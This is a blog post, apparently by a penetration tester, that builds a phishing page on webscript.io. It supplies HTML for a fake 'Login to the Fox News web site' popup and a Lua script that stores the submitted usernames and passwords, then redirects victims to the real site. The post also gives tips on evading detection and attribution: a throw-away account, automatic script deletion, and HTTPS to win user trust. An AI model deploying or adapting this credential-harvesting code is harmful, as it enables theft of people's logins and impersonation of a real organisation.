Security, Programming, Pentesting
by {"login"=>"averagesecurityguy", "email"=>"stephen@averagesecurityguy.info", "display_name"=>"averagesecurityguy", "first_name"=>"", "last_name"=>""}
One of the guys on the Chugalug mailing list mentioned webscript.io on Saturday night and it immediately sounded interesting. The basic concept is you choose a webscript.io subdomain, write a few Lua scripts and you have a web service up and running. The web service can run under HTTP or HTTPS. One of the other guys on the list was equally impressed but wondered what would you do with it. My first thought was phishing. So, I reworked a phishing setup I did a while back and made it work for webscript.io.
I setup an account with webscript.io, you only need an email address to do this, and created two scripts.
return [[
<!-- Add the background to give the popup effect -->
<div id="bg" style="background-color: #111111; opacity: 0.65;
filter: alpha(opacity=65); position: absolute; z-index: 9000;
top: 0px; left: 0px; width: 100%; height: 2000px;"></div>
<!-- Create the login box -->
<div id="login" style="padding: 16px; position: absolute;
top: 40px; left: 40px; background-color: #eeeeee; width: 300px;
z-index: 10000; text-align: left; border: 2px solid #000000;">
<p>Login to the Fox News web site.</p>
<form action="http://foxnews.webscript.io/data" method="POST">
<table border="0" cellpadding="1" cellspacing="1">
<tr><td>Username: </td>
<td><input type="text" name="username" /></td></tr>
<tr><td>Password: </td>
<td><input type="password" name="password" /></td></tr>
<tr><td colspan="2">
<input type="submit" value="Login" /></td></tr>
</table>
</form>
</div>]], {["Content-Type"]="text/html"}
storage[request.form.username] = request.form.password
return 302, '', {
Location ='http://www.foxnews.com'
}
The first script builds a page with a iframe and a "popup" login box. You can modify the HTML to use any target site that allows itself to be framed or you could use a screenshot of the target as a background. When the username and password are submitted webscript.io stores it for you and displays it on your management page when you log in.
One problem with using webscript.io is you can't choose your own domain name, but truthfully, phishing victims are not know for paying attention to details. You can also mitigate this problem by using HTTPS, because most users don't think past getting the green "secure" web site indicator.
One big benefit is that webscript.io automatically deletes your scripts after 7 days. So, you could setup an account with a throw-away email address, run your campaign, and walk away. Webscript.io will clean it all up for you. Also, looking through the examples it looks like you can send emails through them as well. It's a one stop phishing shop. :)
tags: